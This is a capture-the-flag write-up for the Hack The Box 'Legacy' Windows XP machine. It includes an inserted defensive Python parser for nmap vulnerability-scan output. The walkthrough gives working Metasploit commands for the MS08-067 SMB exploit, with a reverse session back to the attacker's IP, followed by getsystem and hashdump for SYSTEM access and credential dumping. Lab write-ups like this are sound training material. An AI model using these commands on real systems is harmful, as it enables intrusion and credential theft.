This machine mimics a legacy Windows host (Windows XP). It is a straightforward box: a public exploit for the vulnerability patched by MS08-067 leads to RCE and gives us root (SYSTEM) access directly.
Enjoy..
1. Enumeration:
- Nmap:
$ nmap -sC -sV 10.10.10.4 -Pn
The ports of interest are 139 and 445 (NetBIOS and SMB).
2. Let's run a vulnerability scan against them:
$ sudo nmap -p139,445 --script vuln 10.10.10.4
It revealed an RCE in the SMB service, CVE-2008-4250, the bug patched by MS08-067.
Let's searchsploit it:
It also has plenty of exploits on Exploit-DB and Rapid7.
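Since this vulnerability scan is exactly what tells a defender which hosts are still missing the MS08-067 patch, here is a small Python parser (an added example, not part of the original write-up) that reads nmap's normal-format output, picks out every NSE script that reports "State: VULNERABLE", and returns the affected hosts with their CVE IDs so the result can go straight into a patch-tracking list. The scan text below is constructed to resemble `--script vuln` output against 10.10.10.4 plus a second, already-patched host at 10.10.10.7 (an assumed address); the function names are my own.

```python
import re

# Constructed sample of nmap normal-format (-oN) output from a
# `nmap -p139,445 --script vuln` run. Not real scan data: the second
# host and its "false" results are invented to show a patched machine.
SAMPLE_SCAN = """\
Nmap scan report for 10.10.10.4
Host is up (0.045s latency).

PORT    STATE SERVICE      VERSION
139/tcp open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds Microsoft Windows XP microsoft-ds

Host script results:
| smb-vuln-ms08-067: 
|   VULNERABLE:
|   Microsoft Windows system vulnerable to remote code execution (MS08-067)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2008-4250
|           The Microsoft Windows Server service is vulnerable to remote code execution.
|_smb-vuln-ms10-054: false

Nmap scan report for 10.10.10.7
Host is up (0.031s latency).

PORT    STATE SERVICE      VERSION
445/tcp open  microsoft-ds Microsoft Windows 7 microsoft-ds

Host script results:
|_smb-vuln-ms08-067: false
|_smb-vuln-ms10-054: false
"""

# "Nmap scan report for <host>" starts each host block.
HOST_RE = re.compile(r"^Nmap scan report for (\S+)")
# A script result line is "| name: ..." or "|_name: ..." (exactly one
# space or an underscore after the bar); indented detail lines have more.
SCRIPT_RE = re.compile(r"^\|(?:_| )([\w-]+):\s*(.*)$")
# Detail line carrying the verdict of a vulnerability script.
STATE_RE = re.compile(r"^\|\s+State:\s+(LIKELY VULNERABLE|VULNERABLE)")
# CVE identifiers appear on the "IDs:" detail line as CVE:CVE-YYYY-NNNN.
CVE_RE = re.compile(r"CVE:(CVE-\d{4}-\d+)")


def parse_vuln_scan(text):
    """Return {host: [{"script", "state", "cves"}]} for every host in the scan.

    Hosts with no vulnerable finding still appear, with an empty list, so a
    caller can tell "scanned and clean" apart from "never scanned".
    """
    findings = {}
    host = None
    script = None
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if m:
            host = m.group(1)
            findings.setdefault(host, [])
            script = None
            continue
        if host is None:
            continue
        m = SCRIPT_RE.match(line)
        if m:
            script = m.group(1)
            continue
        if script is None:
            continue
        if STATE_RE.match(line):
            findings[host].append(
                {"script": script, "state": STATE_RE.match(line).group(1), "cves": []}
            )
            continue
        m = CVE_RE.search(line)
        # Attach the CVE only to a finding produced by the current script, so an
        # ID printed under a non-vulnerable script never lands on an earlier one.
        if m and findings[host] and findings[host][-1]["script"] == script:
            findings[host][-1]["cves"].append(m.group(1))
    return findings


def vulnerable_hosts(findings):
    """Sorted list of hosts that have at least one vulnerable finding."""
    return sorted(h for h, f in findings.items() if f)


if __name__ == "__main__":
    results = parse_vuln_scan(SAMPLE_SCAN)
    for h in vulnerable_hosts(results):
        for f in results[h]:
            print(f"{h}\t{f['script']}\t{f['state']}\t{','.join(f['cves'])}")
```

Run it against a saved `-oN` file (`parse_vuln_scan(open("scan.txt").read())`) and the output is a host/script/CVE table you can diff against your patch inventory; a host that shows up here for smb-vuln-ms08-067 should be patched or isolated before anything else on the network, since the write-up above shows how little effort the exploit takes.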
3. Exploitation:
Let's search for the exploit in Metasploit:
$ msfconsole -q >> quiet mode, starts without the banner
$ search ms08-067 >> search by the patch name
$ use exploit/windows/smb/ms08_067_netapi >> select the exploit that was found
then:
$ show options >> see which options need to be set
$ set rhosts 10.10.10.4 >> target machine IP
$ set lhost 10.10.x.x >> your tunnel (VPN) IP
finally:
$ run (or exploit)
- Once we have the meterpreter session, it is slightly harder to run commands or find out which user we are: this is pre-Windows XP SP2, so the "whoami" command does not exist yet.
- But we can either use PsExec to get a SYSTEM shell or simply use the "getsystem" meterpreter command. The "shell" command also works fine, but I didn't like it.
> getsystem
> hashdump
> search -f user.txt
> sysinfo
> pwd
> cd ../../
> cd Documents\ and\ Settings
> cd john
> cd Desktop
> cat user.txt
Getting root.txt:
> search -f root.txt
> cd ../..
> pwd >> back in Documents\ and\ Settings again
then
> cd Administrator
> cd Desktop
> cat root.txt
And that's it.. hope you enjoyed..
If so, kindly give me respect: Wh1rlw1nd-HTB.